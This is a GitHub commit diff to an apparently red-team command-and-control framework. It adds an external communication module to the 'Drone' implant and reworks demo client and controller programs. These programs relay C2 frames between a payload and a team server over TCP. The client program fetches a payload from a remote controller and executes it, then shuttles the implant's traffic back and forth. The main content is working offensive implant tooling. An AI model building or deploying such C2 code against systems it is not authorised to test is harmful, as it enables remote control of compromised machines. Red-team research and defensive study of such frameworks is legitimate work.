Update ExternalC2

rasta-mouse · Apr 23, 2023 · 0b361e9 · 0b361e9
1 parent 049e2af
commit 0b361e9
Show file tree

Hide file tree

Showing 14 changed files with 353 additions and 281 deletions.
diff --git a/Drone/CommModules/ExtCommModule.cs b/Drone/CommModules/ExtCommModule.cs
@@ -0,0 +1,72 @@
+using System;
+using System.Collections.Concurrent;
+using System.Threading;
+using System.Threading.Tasks;
+
+namespace Drone.CommModules;
+
+public class ExtCommModule : P2PCommModule
+{
+    public override ModuleType Type => ModuleType.P2P;
+    public override ModuleMode Mode { get; }
+
+    public override bool Running { get; protected set; }
+
+    public override event Func<C2Frame, Task> FrameReceived;
+    public override event Action OnException;
+
+    private readonly CancellationTokenSource _tokenSource = new();
+
+    // this will be queued by the client controller via reflection
+    public static ConcurrentQueue<byte[]> Inbound { get; set; } = new();
+
+    // this will be dequeued by the client controller via reflection
+    public static ConcurrentQueue<byte[]> Outbound { get; set; } = new();
+
+    public override void Init(Metadata metadata)
+    {
+        // nothing
+    }
+
+    public override Task SendFrame(C2Frame frame)
+    {
+        Outbound.Enqueue(frame.Serialize());
+        return Task.CompletedTask;
+    }
+
+    public override Task Start()
+    {
+        Running = true;
+        return Task.CompletedTask;
+    }
+
+    public override async Task Run()
+    {
+        while (!_tokenSource.IsCancellationRequested)
+        {
+            while (Inbound.TryDequeue(out var data))
+            {
+                try
+                {
+                    var frame = data.Deserialize<C2Frame>();
+                    FrameReceived?.Invoke(frame);
+                }
+                catch
+                {
+                    OnException?.Invoke();
+                    return;
+                }
+            }
+
+            await Task.Delay(100);
+        }
+
+        _tokenSource.Dispose();
+    }
+
+    public override void Stop()
+    {
+        Running = false;
+        _tokenSource.Cancel();
+    }
+}
diff --git a/Drone/Drone.cs b/Drone/Drone.cs
@@ -101,7 +101,7 @@ private async Task RunAsP2PDrone()
         commModule.Init(_metadata);
         commModule.FrameReceived += HandleFrame;
 
-        // this blocks until connected
+        // this blocks until complete
         await commModule.Start();
 
         // a peer has connected, send this metadata

diff --git a/Drone/Drone.csproj b/Drone/Drone.csproj
@@ -120,6 +120,7 @@
         <Compile Include="Commands\WinRmCommand.cs" />
         <Compile Include="Commands\WmiCommand.cs" />
         <Compile Include="CommModules\CommModule.cs" />
+        <Compile Include="CommModules\ExtCommModule.cs" />
         <Compile Include="CommModules\HttpCommModule.cs" />
         <Compile Include="CommModules\SmbCommModule.cs" />
         <Compile Include="CommModules\TcpCommModule.cs" />

diff --git a/ExternalC2/DemoClient/Extensions.cs b/ExternalC2/DemoClient/Extensions.cs
@@ -27,7 +27,11 @@ public static async Task<byte[]> ReadData(this TcpClient client)
         do
         {
             var buf = new byte[1024];
-            read = await stream.ReadAsync(buf, 0, buf.Length);
+
+            var remaining = length - totalRead;
+            var toRead = remaining >= buf.Length ? buf.Length : remaining;
+
+            read = await stream.ReadAsync(buf, 0, toRead);
 
             await ms.WriteAsync(buf, 0, read);
             totalRead += read;
@@ -67,4 +71,10 @@ public static async Task WriteData(this TcpClient client, byte[] data)
         }
         while (bytesRemaining > 0);
     }
+
+    public static bool DataAvailable(this TcpClient client)
+    {
+        var stream = client.GetStream();
+        return stream.DataAvailable;
+    }
 }
diff --git a/ExternalC2/DemoClient/Program.cs b/ExternalC2/DemoClient/Program.cs
@@ -1,7 +1,6 @@
 using System;
 using System.Net;
 using System.Net.Sockets;
-using System.Text;
 using System.Threading.Tasks;
 
 using ExternalC2.Net.Client;
@@ -22,43 +21,37 @@ public static async Task Main(string[] args)
         var port = int.Parse(args[1]);
 
         // connect to controller
-        var client = new TcpClient();
-        await client.ConnectAsync(target, port);
-
-        // generate and send a pipename
-        var pipename = Guid.NewGuid().ToString();
-        await client.WriteData(Encoding.Default.GetBytes(pipename));
+        var controller = new TcpClient();
+        await controller.ConnectAsync(target, port);
 
         // read payload
-        var payload = await client.ReadData();
-
-        // create new client controller
-        var controller = new ClientController(pipename);
-
-        if (!await controller.ExecutePayload(payload))
+        var payload = await controller.ReadData();
+
+        // create drone controller
+        var drone = new DroneController();
+
+        // event is fired whenever the drone sends outbound data
+        drone.OnDataFromDrone += async delegate(byte[] bytes)
         {
-            Console.WriteLine("Failed to connect to pipe");
-            return;
-        }
+            // send to controller
+            await controller.WriteData(bytes);
+        };
 
-        // drop into a loop
+        drone.ExecutePayload(payload);
+
+        // drop into loop
         while (controller.Connected)
         {
-            // read from drone
-            var outbound = await controller.ReadDrone();
-
-            // send to controller
-            await client.WriteData(outbound);
-
-            // read from controller
-            var inbound = await client.ReadData();
-
-            // send to drone
-            await controller.SendDrone(inbound);
+            if (controller.DataAvailable())
+            {
+                // read from controller
+                var downstream = await controller.ReadData();
+
+                // send it to the drone
+                drone.SendDrone(downstream);
+            }
 
             await Task.Delay(100);
         }
-
-        controller.Dispose();
     }
 }
diff --git a/ExternalC2/DemoController/Extensions.cs b/ExternalC2/DemoController/Extensions.cs
@@ -7,7 +7,7 @@ namespace DemoController;
 
 public static class Extensions
 {
-    public static bool HasData(this TcpClient client)
+    public static bool DataAvailable(this TcpClient client)
     {
         var stream = client.GetStream();
         return stream.DataAvailable;
@@ -33,7 +33,11 @@ public static async Task<byte[]> ReadData(this TcpClient client)
         do
         {
             var buf = new byte[1024];
-            read = await stream.ReadAsync(buf, 0, buf.Length);
+
+            var remaining = length - totalRead;
+            var toRead = remaining >= buf.Length ? buf.Length : remaining;
+
+            read = await stream.ReadAsync(buf, 0, toRead);
 
             await ms.WriteAsync(buf, 0, read);
             totalRead += read;

diff --git a/ExternalC2/DemoController/Program.cs b/ExternalC2/DemoController/Program.cs
@@ -1,7 +1,6 @@
 using System;
 using System.Net;
 using System.Net.Sockets;
-using System.Text;
 using System.Threading.Tasks;
 
 using ExternalC2.NET.Server;
@@ -21,48 +20,42 @@ public static async Task Main(string[] args)
         var target = IPAddress.Parse(args[0]);
         var port = int.Parse(args[1]);
 
-        // connect to the team server
-        var controller = new ServerController(target, port);
-        if (!await controller.Connect())
-        {
-            Console.WriteLine($"Failed to connect to {target}:{port}.");
-            return;
-        }
-
         // wait for a connection from a client
         var listener = new TcpListener(IPAddress.Loopback, 9999);
         listener.Start(100);
 
-        var client = await listener.AcceptTcpClientAsync();
-
-        // stop the listener
-        listener.Stop();
-
-        // read pipename from client
-        var pipename = Encoding.Default.GetString(await client.ReadData());
-
-        // request payload
-        var payload = await controller.RequestPayload(pipename);
-
-        // send it to the client
-        await client.WriteData(payload);
+        while (true)
+        {
+            // block until a client connects
+            var client = await listener.AcceptTcpClientAsync();
+
+            // handle each client in its own task
+            var controller = new ServerController(target, port);
+            _ = Task.Run(async () => await HandleClient(controller, client));
+        }
+    }
+
+    private static async Task HandleClient(ServerController controller, TcpClient client)
+    {
+        controller.OnDataFromTeamServer += async delegate(byte[] data)
+        {
+            // send any data received from the team server to the client
+            await client.WriteData(data);
+        };
 
-        // drop into loop
+        // run the controller
+        _ = controller.Start();
+
+        // read from the client
         while (client.Connected)
         {
-            if (client.HasData())
+            // this is upstream from the drone
+            if (client.DataAvailable())
             {
-                // read from client
-                var inbound = await client.ReadData();
-
-                // send it to team server
-                await controller.SendData(inbound);
-
-                // read data from team server
-                var outbound = await controller.ReadData();
+                var upstream = await client.ReadData();
 
-                // send it to the client
-                await client.WriteData(outbound);
+                // give it to the controller
+                await controller.SendData(upstream);
             }
 
             await Task.Delay(100);